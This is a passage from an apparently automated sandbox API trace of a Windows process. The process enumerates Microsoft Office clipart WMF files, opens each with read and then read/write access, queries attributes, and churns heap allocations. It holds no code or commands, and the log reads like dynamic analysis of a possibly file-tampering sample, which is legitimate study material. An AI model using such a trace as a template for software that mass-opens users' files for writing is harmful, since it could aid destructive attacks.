Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.094] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.094] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.094] AreFileApisANSI () returned 1 [0103.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.094] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\boatinst.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.094] GetFileType (hFile=0x368) returned 0x1 [0103.094] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.095] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.095] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.095] CloseHandle (hObject=0x368) returned 1 [0103.095] AreFileApisANSI () returned 1 [0103.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8af48 [0103.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8af48, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 69 [0103.095] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\boatinst.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.095] GetFileType (hFile=0x368) returned 0x1 [0103.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0103.096] CloseHandle (hObject=0x368) returned 1 [0103.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0103.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0103.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0103.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0103.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0103.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0103.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0103.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0103.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.097] AreFileApisANSI () returned 1 [0103.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a5c8 [0103.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 69 [0103.097] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\boatinst.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x714c)) returned 1 [0103.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0103.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0103.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0103.097] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.097] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.097] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6d2045, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x532, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BS00076_.WMF", cAlternateFileName="")) returned 1 [0103.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0103.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0103.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0103.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0103.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0103.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0103.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0103.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0103.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0103.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b110 [0103.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0103.098] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.098] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.098] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.098] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0103.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.098] AreFileApisANSI () returned 1 [0103.098] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0103.098] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.098] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0103.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0103.098] AreFileApisANSI () returned 1 [0103.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a828 [0103.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x8a828, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 69 [0103.099] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00076_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.099] GetFileType (hFile=0x368) returned 0x1 [0103.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0103.099] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.099] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.099] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.099] CloseHandle (hObject=0x368) returned 1 [0103.100] AreFileApisANSI () returned 1 [0103.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ad80 [0103.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 69 [0103.100] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00076_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.100] GetFileType (hFile=0x368) returned 0x1 [0103.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0103.100] CloseHandle (hObject=0x368) returned 1 [0103.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0103.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0103.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0103.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0103.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0103.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0103.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0103.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0103.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.101] AreFileApisANSI () returned 1 [0103.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a5c8 [0103.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 69 [0103.101] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00076_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6d2045, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x532)) returned 1 [0103.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0103.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0103.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0103.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0103.102] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.102] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.102] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5a4, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BS00078_.WMF", cAlternateFileName="")) returned 1 [0103.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0103.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0103.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0103.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0103.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0103.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0103.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0103.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0103.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0103.102] RtlAllocateHeap 